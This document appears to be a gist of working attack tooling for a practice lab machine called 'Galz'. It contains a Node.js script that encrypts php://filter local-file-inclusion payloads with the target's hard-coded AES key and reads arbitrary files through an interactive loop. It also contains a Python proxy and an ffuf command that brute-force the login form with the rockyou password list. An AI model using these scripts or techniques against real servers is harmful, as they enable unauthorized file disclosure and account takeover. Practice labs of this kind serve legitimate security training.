Galz - Hacktrace (bruteforcing admin pages & Automating LFI)
var crypto = require("crypto");
var readline = require("readline");
var axios = require("axios");
var cheerio = require("cheerio");
var cryptojs = require("crypto-js");
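function decrypt(data) {
  // Decrypt a base64 ciphertext produced for the target's `page` parameter
  // (see get()/encrypt()). AES-128-CBC with PKCS#7 padding, which is exactly
  // what crypto-js applied by default with a 16-byte key, so existing
  // ciphertexts decrypt identically with Node's built-in crypto.
  // Hard-coded key/IV: they belong to the target application, not to this tool.
  const key = Buffer.from("0123456789abcdef0123456789abcdef", "hex");
  const iv = Buffer.from("abcdef9876543210abcdef9876543210", "hex");
  const decipher = crypto.createDecipheriv("aes-128-cbc", key, iv);
  const plain = Buffer.concat([
    decipher.update(Buffer.from(data, "base64")),
    decipher.final(), // throws on bad padding / truncated input
  ]);
  // Return the plaintext instead of logging it: callers print it themselves,
  // and the old `return console.log(...)` made `console.log(decrypt(x))`
  // print the text followed by "undefined".
  return plain.toString("utf8");
}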
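function encrypt(data) {
  // Encrypt a UTF-8 string the way the target expects its `page` parameter
  // and return the ciphertext as base64. AES-128-CBC with PKCS#7 padding —
  // the crypto-js default for a 16-byte key — so output is byte-identical to
  // the previous implementation, without the third-party dependency.
  // Hard-coded key/IV: they belong to the target application, not to this tool.
  // Fixed IV means equal inputs give equal outputs (the target relies on that).
  const key = Buffer.from("0123456789abcdef0123456789abcdef", "hex");
  const iv = Buffer.from("abcdef9876543210abcdef9876543210", "hex");
  const cipher = crypto.createCipheriv("aes-128-cbc", key, iv);
  // cipher.update() throws a TypeError for a missing/non-string input rather
  // than silently encrypting the string "undefined".
  const out = Buffer.concat([cipher.update(data, "utf8"), cipher.final()]);
  return out.toString("base64");
}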
// Interactive prompt used by "loop" mode (see prompt()).
// NOTE(review): this is created at module load for every mode; readline resumes
// stdin, so a mode that never calls rl.close() keeps the process alive after its
// output — confirm with `node key.js encrypt x`.
const stdio = { input: process.stdin, output: process.stdout };
const rl = readline.createInterface(stdio);
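function quote_plus(str) {
  // Percent-encode `str` for use in a query string, with spaces written as '+'.
  // encodeURIComponent already leaves ! ' ( ) * unescaped, so the per-character
  // "restore" replacements the original carried (%21, %27, %28, %29, %2A) could
  // never match and are dropped; behaviour is unchanged.
  // NOTE: unlike Python's urllib.parse.quote_plus this does NOT escape !'()*.
  // For the base64 payloads built in get() (only + / = need escaping) that
  // makes no difference.
  return encodeURIComponent(str).replace(/%20/g, "+");
}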
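async function get(req) {
  // Read `req` through the LFI: wrap it in a php://filter chain so the file
  // comes back base64-encoded (survives HTML rendering), encrypt it the way the
  // target expects its `page` parameter, then URL-encode it for the query.
  // TARGET in the environment overrides the hard-coded box address.
  const base = process.env.TARGET || "http://10.1.2.122:10000/dashz/";
  // `const` instead of the original implicit global (`fuck = ...`).
  const payload = quote_plus(encrypt(`php://filter/convert.base64-encode/resource=${req}`));
  const url = `${base}?page=${payload}`;
  try {
    const response = await axios.get(url);
    const $ = cheerio.load(response.data);
    const content = $(".chart-stage").html();
    if (content == null) {
      // Selector matched nothing: the inclusion failed or the page layout differs.
      console.error("[-] Error: no .chart-stage element in the response");
    } else {
      // Decode via Buffer, not atob(): atob() yields a latin1 "binary string"
      // and mangles any non-ASCII bytes in the included file.
      console.log(Buffer.from(content.trim(), "base64").toString("utf8"));
    }
  } catch (error) {
    console.error("[-] Error: ", error);
  } finally {
    // Re-arm the interactive prompt whether or not the request succeeded.
    prompt();
  }
}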
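function prompt() {
  // Ask for one file path, fire the LFI request for it, and show the encrypted
  // form of the raw input (handy for replaying by hand). "exit" ends the loop.
  rl.question("cmd> ", (input) => {
    if (input.trim() === "exit") {
      rl.close();
      return;
    }
    // Log the encrypted form before starting the request: get() is asynchronous
    // and re-prompts when it finishes, so logging after it interleaved this line
    // with the fetched file contents.
    console.log("---\n[+] encrypted: ", encrypt(input), "\n---\n");
    get(input);
  });
}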
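// CLI entry point:
//   node key.js loop              interactive LFI shell (see prompt()/get())
//   node key.js encrypt <text>    print the encrypted form of <text>
//   node key.js decrypt <base64>  print the plaintext of <base64>
// The one-shot modes close the readline interface afterwards so the process
// exits instead of sitting on an open stdin.
const mode = process.argv[2];
const arg = process.argv[3];
switch (mode) {
  case "loop":
    prompt();
    break;
  case "encrypt":
  case "decrypt":
    if (arg === undefined) {
      console.error(`usage: node key.js ${mode} <value>`);
      process.exitCode = 1;
    } else {
      console.log(mode === "encrypt" ? encrypt(arg) : decrypt(arg));
    }
    rl.close();
    break;
  default:
    // Previously an unknown/missing mode did nothing at all (and then hung on stdin).
    console.error("usage: node key.js loop | encrypt <text> | decrypt <base64>");
    process.exitCode = 1;
    rl.close();
}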
| # ffuf -u http://127.0.0.1:8000/\?username=admin\&password=FUZZ\&login=login -w /opt/seclists/Passwords/Leaked-Databases/rockyou.txt -c -r -fs 1350 | |
| from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer | |
| from urllib.parse import parse_qs | |
| from pwn import log | |
| import requests, subprocess, threading | |
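class RequestHandler(BaseHTTPRequestHandler):
    """Local HTTP proxy that lets ffuf brute-force the target's login form.

    ffuf requests ``/?username=<u>&password=<p>&login=login`` on this server;
    the handler encrypts the candidate password the way the target expects
    (by shelling out to ``key.js``), POSTs the form to the target and relays
    the target's response body so ffuf can filter on its size.
    """

    # Login endpoint of the target machine.
    TARGET = "http://10.1.2.122:10000/"
    # Response size of a failed login; anything else is reported as a hit.
    # Keep in sync with the ``-fs 1350`` filter in the ffuf command above.
    FAIL_LENGTH = 1350
    # Upper bound on the round trip to the target so a dead host does not pin
    # a worker thread forever.
    TIMEOUT = 15

    def log_message(self, format, *args):
        # Silence the default per-request access log; pwntools' ``log`` is used
        # for the interesting events instead.
        pass

    def _encrypt_password(self, plain):
        """Return ``plain`` encrypted by ``node key.js`` (stripped stdout).

        Raises OSError if node cannot be started and
        subprocess.CalledProcessError if it exits non-zero.
        """
        # Argument list, no shell: candidates come straight from a wordlist and
        # may contain quotes, backticks or $(...), which the original
        # shell=True string interpolation would have handed to the shell.
        # NOTE(review): the key.js in this gist dispatches on argv[2]
        # ("loop"/"encrypt"/"decrypt"); the original passed the password as
        # argv[2], which falls into its default case and prints nothing.
        # Confirm against the key.js actually deployed next to this script.
        # stdin=DEVNULL keeps the child from inheriting (and waiting on) the
        # terminal's stdin.
        return subprocess.check_output(
            ["node", "key.js", "encrypt", plain],
            stdin=subprocess.DEVNULL,
            text=True,
        ).strip()

    def do_GET(self):
        """Handle one ffuf probe: encrypt, forward to the target, relay the reply."""
        # Query string only: ``/?a=b`` -> ``a=b`` (also tolerates a bare ``/``).
        _, _, query = self.path.partition("?")
        params = parse_qs(query)
        user = params.get("username", [""])[0]
        plain = params.get("password", [""])[0]

        try:
            passwd = self._encrypt_password(plain)
        except (OSError, subprocess.CalledProcessError) as exc:
            log.failure(f"key.js failed for {plain!r}: {exc}")
            self.send_error(500, "key.js failed")
            return

        form = {"username": user, "password": passwd, "login": "login"}
        try:
            # requests encodes a dict body as application/x-www-form-urlencoded
            # and sets the Content-Type itself.
            res = requests.post(self.TARGET, data=form, timeout=self.TIMEOUT)
        except requests.RequestException as exc:
            log.failure(f"target unreachable: {exc}")
            self.send_error(502, "target unreachable")
            return

        size = len(res.content)
        details = (
            f"username: {user}\nplain-text password: {plain}\n"
            f"encrypted password: {passwd}\nresponse status: {res.status_code}\n"
            f"content-length: {size}\n\n"
        )
        if size == self.FAIL_LENGTH:
            log.info("testing...\n" + details)
        else:
            log.success("found!\n" + details)

        # Relay the target's body verbatim so ffuf's -fs filter sees the same size.
        self.send_response(res.status_code)
        self.send_header("Content-type", "text/plain")
        self.send_header("Content-Length", str(size))
        self.end_headers()
        self.wfile.write(res.content)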
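host = "127.0.0.1"
port = 8000
server = ThreadingHTTPServer((host, port), RequestHandler)
# Worker threads die with the main thread, so Ctrl-C stops the proxy even while
# a request is in flight. (The original set ``server.max_threads``, which is
# not a ThreadingHTTPServer attribute and had no effect.)
server.daemon_threads = True
log.warn(f"Server created by sharpicx\nhosted on {host}:{port}\n\n")
# The hint must include this proxy's port or ffuf targets the wrong listener.
log.warn(f"automating hacktrace machine: Galz\ngo attack it at: http://{host}:{port}/?username=FUZZ&password=FUZZ&login=login\n\n")
try:
    # Serve on the main thread instead of start()/join(): KeyboardInterrupt
    # then reaches us and the non-daemon server thread no longer keeps the
    # process alive after Ctrl-C.
    server.serve_forever()
except KeyboardInterrupt:
    pass
finally:
    server.server_close()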